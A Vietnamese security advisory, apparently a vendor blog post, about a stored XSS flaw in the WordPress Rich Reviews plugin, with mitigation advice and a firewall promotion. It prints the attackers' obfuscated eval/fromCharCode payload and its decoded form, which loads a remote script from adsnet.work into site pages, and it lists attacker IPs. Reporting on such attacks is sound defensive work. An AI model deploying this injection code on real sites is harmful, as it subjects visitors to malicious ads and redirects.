Một lỗ hổng XSS nghiêm trọng đã được phát hiện bên trong plugin Đánh giá phong phú. Theo ước tính, plugin Rich Reviews có hơn 16.000 lượt tải xuống đang hoạt động. Mặc dù rất quan trọng, việc phát hiện ra lỗ hổng bảo mật không có gì đáng ngạc nhiên, vì thực tế là plugin đã không được cập nhật trong hơn hai năm.
Trên thực tế, Đánh giá phong phú đã bị xóa khỏi thư mục plugin WordPress sáu tháng trở lại vào ngày 11 tháng 3 năm 2019. Ngoài ra, các phiên bản bị ảnh hưởng là 1.7.4 trở về trước . Thật đáng ngạc nhiên, không có tin tức nào về việc phát hành bản vá cho đến nay.
Chi tiết về lỗ hổng trong bài đánh giá nhiều định dạng
Lỗ hổng đã được xác định là một XSS được lưu trữ. Do đó, bất kỳ người dùng chưa được xác thực nào cũng có thể khai thác bản cập nhật tùy chọn plugin trong bất kỳ trang web WordPress nào có cài đặt plugin.
Hiện tại, việc khai thác dưới hình thức quảng cáo độc hại đã được đưa ra ánh sáng. Tin tặc đang sử dụng lỗ hổng này để đưa mã độc hại vào các trang web, kích hoạt cửa sổ bật lên hoặc quảng cáo độc hại. Hơn nữa, những quảng cáo và cửa sổ bật lên này chuyển hướng đến các trang web xúc phạm và tục tĩu.
Chi tiết kỹ thuật
Thủ phạm chính của cuộc tấn công là thiếu kiểm soát truy cập trong plugin. Ngoài ra, quy tắc Vệ sinh cũng không đúng.
Các mã độc hại kích hoạt quảng cáo chuyển hướng và cửa sổ bật lên được mô tả bên dưới. Lưu ý rằng tin tặc đã làm xáo trộn mã một cách thông minh để bỏ qua việc phát hiện.
eval(String.fromCharCode(118, 97, 114, 32, 115, 99, 114, 105, 112, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 10, 115, 99, 114, 105, 112, 116, 46, 111, 110, 108, 111, 97, 100, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 125, 59, 10, 115, 99, 114, 105, 112, 116, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 97, 100, 115, 110, 101, 116, 46, 119, 111, 114, 107, 47, 115, 99, 114, 105, 112, 116, 115, 47, 112, 108, 97, 99, 101, 46, 106, 115, 34, 59, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 99, 114, 105, 112, 116, 41, 59));
Đoạn mã trên chuyển đổi thành mã này khi giải mã:
var script = document.createElement('script');
script.onload = function() {
};
script.src = "https://adsnet.work/scripts/place.js";
document.getElementsByTagName('head')[0].appendChild(script);
Đã xác định được tin tặc
Các địa chỉ IP sau có liên kết với hầu hết các cuộc tấn công:
- 94.229.170.38
- 183.90.250.26
- 69.27.116.3
Ngoài ra, một tên miền cũng đã được xác định. Nó đi bởi adsnet.work . Cẩn thận với bất kỳ nỗ lực đăng nhập nào từ các IP này. Đó sẽ là giải pháp tốt hơn để chặn họ truy cập trang web của bạn trước.
Loại bỏ nhiễm trùng
Trong trường hợp bạn không may là nạn nhân của cuộc tấn công, đừng hoảng sợ. Liên hệ với các chuyên gia bảo mật của Astra và chúng tôi sẽ khắc phục mọi thứ giúp bạn để bạn dễ thở.
Kỹ thuật giảm thiểu rủi ro
Những người chưa bị nhiễm nên đề phòng khi có thời gian. Dưới đây là một số điều bạn có thể làm để ngăn chặn sự lây nhiễm đến bạn.
Xóa trình cắm
Vì plugin đã bị thu hồi khỏi thư mục WP, không có nghĩa là nhà phát triển có thể phân phối phiên bản cập nhật. Chúng tôi khuyên bạn nên xóa plugin ngay lập tức để đảm bảo an toàn. Ngoài ra, nhà phát triển không có ý định phát hành bản vá sớm.
Bảo vệ bằng Tường lửa
Sau khi bạn đã gỡ bỏ plugin, hãy sử dụng tường lửa để bảo vệ khỏi bất kỳ cuộc tấn công nào tương tự. Tường lửa Astra là một lựa chọn hiệu quả cho WordPress. Nó chặn XSS, CSRF, SQLi, bot xấu, LFI, RFI, OWASP top 10 và hơn 100 cuộc tấn công mạng khác ảnh hưởng đến trang web của bạn.
Giúp tôi bảo vệ trang web của mình.